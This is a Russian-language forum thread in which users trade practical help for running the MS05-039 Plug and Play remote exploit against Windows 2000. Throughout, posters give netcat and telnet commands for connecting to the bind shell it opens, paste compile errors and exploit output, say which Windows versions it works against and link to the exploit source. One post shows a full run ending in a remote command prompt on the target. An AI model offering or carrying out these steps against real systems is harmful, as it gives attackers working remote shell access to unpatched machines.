Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 2 3 4 5 След.
RSS
Microsoft Windows 2000 Plug and Play Universal Remote Exploit (MS05...
 
k shelu vot tak poprobui
C:\>nc 192.168.0.1 7777
 
ноль реакции, пробовал уже... что telnet, что netcat. Получилось у кого?
 
Тем, у кого к шеллу не подрубиться: а вы уверены, что порт открытый появился? Проверьте командой netstat -a
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
<font face="Verdana, Arial, Helvetica, sans-serif">Старая добрая putty коннектицо на ура... открывал 5555 ))</font>
 
www.illmob.org - здесь есть откомпиленый [IMG]http://www.securitylab.ru/forum/smileys/smiley2.gif[/IMG]
 
WinXP SP2 ктонть смог пробить? Вроде написано что поддерживается, но ничего не выходит :|
 
я вот зашёл на пакетштормсекурити и там увидел не многа другую версию кода этой баги,который скомпилился отлично стандартным Visual C++ ; для прикола решил попробовать скомпилеть этот,вот что получил :

--------------------Configuration: test - Win32 Debug--------------------
Compiling...
test.c
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(65) : error C2001: newline in constant
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(66) : error C2059: syntax error : constant
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(66) : error C2017: illegal escape sequence
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(66) : error C2017: illegal escape sequence
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(66) : error C2017: illegal escape sequence
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(66) : error C2001: newline in constant
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(91) : error C2153: hex constants must have at least one hex digit
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(92) : error C2059: syntax error : constant
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(93) : error C2153: hex constants must have at least one hex digit
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(95) : error C2153: hex constants must have at least one hex digit
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(97) : error C2153: hex constants must have at least one hex digit
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(115) : error C2153: hex constants must have at least one hex digit
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(116) : error C2059: syntax error : constant
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(117) : error C2153: hex constants must have at least one hex digit
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(167) : error C2001: newline in constant
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(168) : error C2143: syntax error : missing ) before constant
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(168) : error C2017: illegal escape sequence
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(168) : error C2001: newline in constant
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(202) : error C2001: newline in constant
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(203) : error C2059: syntax error : bad suffix on number
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(203) : error C2177: constant too big
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(203) : error C2143: syntax error : missing ) before constant
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(203) : error C2198: BindRpcInterface : too few actual parameters
c:\documents and settings\dsr_\ðàáî÷èé ñòîë\test.c(203) : error C2001: newline in constant
Error executing cl.exe.

test.exe - 24 error(s), 0 warning(s)

[IMG]http://www.securitylab.ru/forum/smileys/smiley18.gif[/IMG] ...г
 
Цитата
Гость пишет:
k shelu vot tak poprobui
C:\>nc 192.168.0.1 7777

А где взять nc?? че за утилита?
 
netcat, на сайте в файлах лежит
 
если не нают неткат,то кто ж там этот сплоит юзает )))
 
У меня W2k в перезагрузку уходит с NT AUTORITY \SySTEM
 
может он и знает просто непонял тебя
 
хз   у меня что то  не то   пишет


* [*] connecting to 192.168.7.1:445...ok
* [*] null session...ok
* [*] bind pipe...ok
* [*] sending crafted packet...ok
* [*] check your shell on 192.168.7.1:5555
стоит  windows sp2
шел  не  получить не как не  с помошью  путти  как ктото тут  писал  чтона  все  100  % так и  через nc и telnet  хз  прост  наверно я ламо  "":)))
 
кстати насчет  шелла ,  так это потому что  порт  о  котором сплойт  говорит  что  открыл ,не  правда он закрыт  @nc@
 
!!!Therefore, on Windows XP Service Pack 2 and Windows Server 2003, this is strictly a local privilege elevation vulnerability.!!!!
 
Народ почитайте в исходнике эксплоита. Там написано что для XP надо нуль сессию устанавливать, и как я понял с админовскими привилегиями.
 
W2k + SP4 + патчи - работает [IMG]http://www.securitylab.ru/forum/smileys/smiley2.gif[/IMG]
Win XP + SP2 + патчи - не работает ни удалённо ни локально  [IMG]http://www.securitylab.ru/forum/smileys/smiley19.gif[/IMG]
 
Используйте эксплоит написанный Houseofdabus ом:

http://www.milw0rm.com/id.php?id=1149
http://www.packetstormsecurity.nl/filedesc/HOD-ms05039-pnp-e xpl.c.html

Он действительно универсальный, не то говно, что лежит здесь. Компилируется без проблем на Linux и Win.

Эту уязвимость удаленно можно использовать только против Win2000, что написанно в начале эксплоита.
 
RPC DCOM v.2?  [IMG]http://www.securitylab.ru/forum/smileys/smiley11.gif[/IMG]
 
linux@server:~$ MS05-039 192.168.0.1 7777

      (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
                  Universal  Exploit + no crash shellcode

                      Copyright © 2005 .: houseofdabus :.

[*] connecting to 192.168.0.1:445...ok
[*] null session...ok
[*] bind pipe...ok
[*] sending crafted packet...ok
[*] check your shell on 192.168.0.1:7777

Ctrl+C

linux@server:~$ telnet 192.168.0.1 7777
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is ^].
Microsoft Windows 2000 [Version 5.00.2195]
© Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>
-------
все великолепно работает!
Страницы: Пред. 1 2 3 4 5 След.
Читают тему (гостей: 1)